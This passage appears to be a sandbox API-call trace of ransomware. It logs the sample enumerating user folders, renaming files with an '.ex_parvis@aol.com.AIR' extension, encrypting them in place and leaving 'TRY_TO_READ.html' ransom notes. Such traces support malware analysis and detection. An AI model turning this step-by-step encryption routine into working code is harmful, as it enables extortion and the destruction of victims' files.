ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97882990, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97882990, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0161.197] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.197] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.197] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini", dwFileAttributes=0x80) returned 1 [0161.197] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned 54 [0161.197] GetProcessHeap () returned 0x2e0000 [0161.197] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd2) returned 0x319d30 [0161.197] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" [0161.197] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0161.197] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.201] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c8 [0161.201] GetProcessHeap () returned 0x2e0000 [0161.201] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.201] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=282) returned 1 [0161.201] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x11a [0161.201] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.201] GetProcessHeap () returned 0x2e0000 [0161.201] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.201] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.201] WriteFile (in: hFile=0x4c8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.202] WriteFile (in: hFile=0x4c8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.202] WriteFile (in: hFile=0x4c8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.202] ReadFile (in: hFile=0x4c8, lpBuffer=0x336dd8, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x336dd8*, lpNumberOfBytesRead=0x2acf9c8*=0x11a, lpOverlapped=0x0) returned 1 [0161.202] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=-282, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.202] WriteFile (in: hFile=0x4c8, lpBuffer=0x31fae0*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesWritten=0x2acf9c8*=0x11a, lpOverlapped=0x0) returned 1 [0161.202] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x97882990, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97882990, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e4d8 [0161.203] FindNextFileW (in: hFindFile=0x35e4d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x97882990, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97882990, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.203] FindNextFileW (in: hFindFile=0x35e4d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0161.203] FindNextFileW (in: hFindFile=0x35e4d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0161.203] FindNextFileW (in: hFindFile=0x35e4d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0161.203] FindNextFileW (in: hFindFile=0x35e4d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97882990, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97882990, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97882990, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.203] FindNextFileW (in: hFindFile=0x35e4d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97882990, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97882990, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97882990, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0161.203] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.203] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.203] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms", dwFileAttributes=0x80) returned 1 [0161.203] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned 67 [0161.204] GetProcessHeap () returned 0x2e0000 [0161.204] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xec) returned 0x336dd8 [0161.204] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" [0161.204] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.12781717671972518758.ex_parvis@aol.com.AIR" [0161.204] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.206] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc [0161.206] GetProcessHeap () returned 0x2e0000 [0161.206] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0161.206] GetFileSizeEx (in: hFile=0x4cc, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=248) returned 1 [0161.206] SetFilePointer (in: hFile=0x4cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xf8 [0161.206] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.206] GetProcessHeap () returned 0x2e0000 [0161.206] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.206] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.207] WriteFile (in: hFile=0x4cc, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.207] WriteFile (in: hFile=0x4cc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.208] WriteFile (in: hFile=0x4cc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.208] ReadFile (in: hFile=0x4cc, lpBuffer=0x336dd8, nNumberOfBytesToRead=0xf8, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x336dd8*, lpNumberOfBytesRead=0x2acf9c8*=0xf8, lpOverlapped=0x0) returned 1 [0161.208] SetFilePointer (in: hFile=0x4cc, lDistanceToMove=-248, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.208] WriteFile (in: hFile=0x4cc, lpBuffer=0x31fae0*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesWritten=0x2acf9c8*=0xf8, lpOverlapped=0x0) returned 1 [0161.208] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.208] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.208] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms", dwFileAttributes=0x80) returned 1 [0161.208] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned 60 [0161.208] GetProcessHeap () returned 0x2e0000 [0161.208] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xde) returned 0x319d30 [0161.208] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" [0161.208] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.12781717671972518758.ex_parvis@aol.com.AIR" [0161.208] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.211] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc [0161.211] GetProcessHeap () returned 0x2e0000 [0161.211] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.211] GetFileSizeEx (in: hFile=0x4cc, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=248) returned 1 [0161.211] SetFilePointer (in: hFile=0x4cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xf8 [0161.211] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.211] GetProcessHeap () returned 0x2e0000 [0161.211] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.211] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.212] WriteFile (in: hFile=0x4cc, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.213] WriteFile (in: hFile=0x4cc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.213] WriteFile (in: hFile=0x4cc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.213] ReadFile (in: hFile=0x4cc, lpBuffer=0x336dd8, nNumberOfBytesToRead=0xf8, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x336dd8*, lpNumberOfBytesRead=0x2acf9c8*=0xf8, lpOverlapped=0x0) returned 1 [0161.213] SetFilePointer (in: hFile=0x4cc, lDistanceToMove=-248, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.213] WriteFile (in: hFile=0x4cc, lpBuffer=0x31fae0*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesWritten=0x2acf9c8*=0xf8, lpOverlapped=0x0) returned 1 [0161.213] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.213] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.213] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini", dwFileAttributes=0x80) returned 1 [0161.214] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned 51 [0161.214] GetProcessHeap () returned 0x2e0000 [0161.214] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xcc) returned 0x3470a0 [0161.214] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" [0161.214] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0161.214] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.216] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc [0161.217] GetProcessHeap () returned 0x2e0000 [0161.217] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0161.217] GetFileSizeEx (in: hFile=0x4cc, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=524) returned 1 [0161.217] SetFilePointer (in: hFile=0x4cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x20c [0161.217] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.217] GetProcessHeap () returned 0x2e0000 [0161.217] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.217] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.217] WriteFile (in: hFile=0x4cc, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.218] WriteFile (in: hFile=0x4cc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.218] WriteFile (in: hFile=0x4cc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.218] ReadFile (in: hFile=0x4cc, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x20c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x20c, lpOverlapped=0x0) returned 1 [0161.218] SetFilePointer (in: hFile=0x4cc, lDistanceToMove=-524, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.218] WriteFile (in: hFile=0x4cc, lpBuffer=0x31d03f8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d03f8*, lpNumberOfBytesWritten=0x2acf9c8*=0x20c, lpOverlapped=0x0) returned 1 [0161.218] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97882990, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97882990, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97882990, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0161.219] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97882990, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97882990, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97882990, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0161.219] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97882990, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97882990, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97882990, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0161.219] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, 